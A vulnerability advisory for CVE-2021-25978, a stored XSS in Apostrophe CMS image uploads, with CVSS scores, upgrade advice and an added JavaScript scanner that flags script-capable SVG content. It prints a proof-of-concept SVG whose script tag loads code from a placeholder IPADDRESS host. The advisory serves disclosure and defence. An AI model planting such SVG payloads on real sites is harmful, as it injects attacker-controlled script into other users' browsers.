CVE-2021-25978

Date: November 7, 2021

Overview

Apostrophe CMS versions 2.63.0 through 3.3.1 are vulnerable to stored XSS: an editor can upload an SVG file containing malicious JavaScript to the Images module, and the script runs once the file is viewed.

Details

Apostrophe CMS versions 2.63.0 through 3.3.1 are vulnerable to stored XSS: an editor can upload an SVG file containing malicious JavaScript to the Images module. Stored XSS enables self-contained attacks within the application: an attacker doesn't need to find a way of inducing users to make a particular request containing their exploit.

PoC Details

Navigate to the "Images" tab and upload the malicious SVG file.
Run a simple HTTP server that serves a "poc.js" file whose content is alert("XSS");

PoC Code

<svg xmlns="http://www.url.org/2000/svg"
xmlns:xlink="http://www.url.org/1999/xlink">
<script type="text/javascript" href="http://IPADDRESS/poc.js"></script>
</svg>

Affected Environments

2.63.0-3.3.1

Prevention

Upgrade to version 3.4.0
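
A way to screen uploaded or already-stored SVG files for the kind of active content described in this advisory, as an added example (not Apostrophe's code and not the 3.4.0 fix). The function name findActiveSvgContent and its rule set are assumptions; the scan is deliberately conservative, so any finding is a reason to reject the file or serve it as a download instead of inline:

```javascript
// Added example: conservative screen for active content in uploaded SVG text.
// findActiveSvgContent and its rule set are assumptions, not Apostrophe's code.

// Elements that can run script or embed foreign documents inside an SVG.
const ACTIVE_ELEMENTS = ['script', 'foreignObject', 'iframe', 'embed', 'object'];

// Decode numeric character references so scheme checks see the real characters.
const fromRef = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '\ufffd');
function decodeCharRefs(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromRef(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromRef(parseInt(dec, 10)));
}

function findActiveSvgContent(svgText) {
  const findings = new Set();
  // A DTD can define entities that expand into markup a text scan cannot see.
  if (/<!(DOCTYPE|ENTITY)/i.test(svgText)) findings.add('doctype-or-entity');
  for (const name of ACTIVE_ELEMENTS) {
    // Optional namespace prefix, e.g. <svg:script>.
    const tag = new RegExp(`<(?:[\\w.-]+:)?${name}[\\s/>]`, 'i');
    if (tag.test(svgText)) findings.add(`element:${name.toLowerCase()}`);
  }
  // Inline event handler attributes such as onload=.
  if (/[\s"'/]on[a-z]+\s*=/i.test(svgText)) findings.add('event-handler');
  // href / xlink:href / src values with a script-capable scheme.
  const attr = /(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  for (const m of svgText.matchAll(attr)) {
    const raw = decodeCharRefs(m[1] ?? m[2]);
    const value = raw.replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
    if (/^(javascript|data):/.test(value)) findings.add('script-uri');
  }
  return [...findings].sort();
}

// Constructed samples: the first copies the PoC above, the second is a plain drawing.
const POC_SVG = `<svg xmlns="http://www.url.org/2000/svg"
xmlns:xlink="http://www.url.org/1999/xlink">
<script type="text/javascript" href="http://IPADDRESS/poc.js"></script>
</svg>`;
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
<circle cx="5" cy="5" r="4" fill="teal"/>
</svg>`;

console.log(findActiveSvgContent(POC_SVG));
console.log(findActiveSvgContent(BENIGN_SVG));
```

Because this is a text scan and not an XML parse, it can flag benign files (for example, images embedded as data: URIs); it is meant for triage before or alongside the upgrade, not as a replacement for it.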

Language: JS

Good to know:

Cross-Site Scripting (XSS)

CWE-79
Upgrade Version

Upgrade to version apostrophe - 3.4.0

CVSS v3 Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2 Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None